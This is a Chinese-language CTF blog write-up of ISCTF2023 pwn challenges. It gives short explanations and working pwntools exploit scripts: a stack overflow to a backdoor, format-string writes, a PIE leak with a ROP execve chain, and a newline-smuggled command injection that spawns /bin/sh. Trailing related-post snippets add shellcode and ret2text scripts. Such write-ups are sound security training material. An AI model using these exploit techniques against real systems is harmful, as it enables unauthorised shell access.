ISCTF2023

Created2025-08-24|Updated2025-09-17|比赛

|Post Views:

stack

一道不错的题目，让我对pwndbg的使用进一步的熟练

程序代码很简单，自定义输入字符串长度，通过循环不断输入，那么可以造成栈溢出，并且存在后门函数。但是此题的关键在于变量i会被覆盖，那么就会导致程序根据i将我们输入的东西写入到另一个地方。

因此，我们可以找准i的偏移，防止其被覆盖，我们就可以正常栈溢出到返回地址。

from pwn import*
io=remote('challenge.imxbt.cn',20197)
#io=process('./stack')
ret=0x040101a
backdoor=0x4012E6

def debug():
    gdb.attach(io)
    pause()

payload=cyclic(0x1d)+b'\x1f'+b'a'*8+p64(ret)+p64(backdoor)
io.send(b'51')
io.send(payload)

#debug()

io.interactive()

fmt

存在格式化字符串漏洞需要将n18和n52的值分别改为18和52，先算出两者的偏移，再利用%{}$n修改值。

from pwn import*
#io=process('./fmt')
io=remote('gz.imxbt.cn',20153)
def debug():
    gdb.attach(io)
    pause()

payload=b'a'*18+b'%8$n'+b'a'*34+b'%9$n'
io.sendline(payload)
#debug()

io.interactive()

ezpie

开启了pie保护，存在格式化字符串漏洞，可以泄漏基址，又因为存在/bin/sh字符串且存在栈溢出，因此可以打系统调用或者ret2libc。

from pwn import *

#io = process("./ezpie")
io = remote("gz.imxbt.cn",20167)
offset = 88 
io.sendafter('your name->',b'A'*40) 
io.recvuntil(b'A'*40) 
func = u64(io.recv(6).ljust(8,b'\x00')) 
print('func\t',hex(func)) 
base_addr = a - 0x120e 
print(hex(base_addr)) 
main_addr = 0x1254 + base_addr 
pop_rax = 0x12c8 + base_addr 
pop_rdi = 0x1333 + base_addr 
pop_rsi_r15= 0x1331 + base_addr
binsh = 0x2008 + base_addr 
sys_ret = 0x12C5 + base_addr 
payload = cyclic(offset) 
payload += p64(pop_rax) + p64(0x3b) 
payload += p64(pop_rdi) + p64(binsh) 
payload += p64(pop_rsi_r15) + p64(0) + p64(0)
payload += p64(sys_ret) 
io.sendlineafter('please enter your information-> ',payload) 
io.interactive()

touch_file1

有touch命令，然后有字符检查，由于没有禁止\n，那么就使用\n结束touch命令，执行/bin/sh。

from pwn import*
io=remote('gz.imxbt.cn',20302)

io.sendline(b'1')
io.sendline(b'a\n /bin/sh\n')

io.interactive()

Author: Star

Link: http://example.com/2025/08/24/ISCTF2023/

Copyright Notice: All articles on this blog are licensed under CC BY-NC-SA 4.0 unless otherwise stated.

Related Articles

0xGame2024-复现

where_is_my_binsh 一道简单的题目，存在栈溢出以及system函数，没有/bin/sh\x00字符串，给了变量something的地址，那么就先输入/bin/sh\x00字符串再打ret2text。 from pwn import*io=remote('gz.imxbt.cn',20884)elf=ELF('./where_is_my_binsh')bin_sh=0x0404090system=elf.sym['system']ret=0x040101ardi=0x0401323io.sendlineafter('If you want it ,then you have to create...

GeekChallenge2024

ez_shellcode简单的shellcode from pwn import*context.arch='amd64'io=remote('nc1.ctfplus.cn',39373)shellcode_addr=0x0401256shellcode=asm(shellcraft.sh())io.send(shellcode)payload=cyclic(0x18+8)+p64(shellcode_addr)io.sendline(payload)io.interactive() 你会栈溢出吗？简单的64位栈溢出，注意堆栈平衡 from pwn...

2025_SWPU_NSSCTF_秋季招新训练赛

口算题卡一道计算题，主要考察脚本的编写，但因为没有时间限制，所以可以直接算100道题。 from pwn import*s = lambda buf: io.send(buf)sl = lambda buf: io.sendline(buf)sa = lambda delim, buf: io.sendafter(delim, buf)sal = lambda delim, buf: io.sendlineafter(delim, buf)r = lambda n=None: io.recv(n)ra = lambda t=tube.forever: io.recvall(t)ru = lambda delim: io.recvuntil(delim)rl = lambda: io.recvline()rls = lambda n=2**20: io.recvlines(n)su = lambda buf,addr: io.success(buf + "==>" + hex(addr))io =...

Game 就是不断输入1至9的数字，当输入的数字的和大于999时获得shell。 from pwn import*io=remote('61.139.2.1',57621)for _ in range(120): io.sendline(b'9')io.interactive() Real_Login简单的签到题目，输入的字符串与程序设定的password一样就能获得shell。 from pwn import*io=remote('61.139.2.1',59414)io.sendlineafter('your input: ',b'NewStar!!!')io.interactive() gdb 该程序先对字符串进行加密，用户再输入字符串并进行对比，若一致则获得flag。使用gdb进行调试。 from pwn import*io=remote('61.139.2.1',63397)io.sendlineafter('data:...

messages 该程序主要由intput_messages函数与print_messages函数组成，主要实现了先将输入的字符串存储到bss段上，再将字符串拷贝到栈上，由于输出时没有检测字符串最大个数，因此可以造成数组下标越界从而覆盖返回地址返回到getflag函数获得flag。 from pwn import*io=remote('61.139.2.1',62280)payload1=(b'aa\0'*16)[:-1]payload2=b'\x01\x01\x00'*3+p64(0x401196)io.sendlineafter('>',payload1)io.sendlineafter('>',payload2)io.sendlineafter('>',b'\n')io.interactive()

XYNU2024信安杯

全是简单题目，直接上exp NC直接nc连接，然后ls+cat flag即可。 shellcodefrom pwn import*context.arch='amd64'io=remote('gz.imxbt.cn',20029)shellcode=asm(shellcraft.sh())io.sendline(shellcode)io.interactive() ret2libcfrom pwn...

Loading Database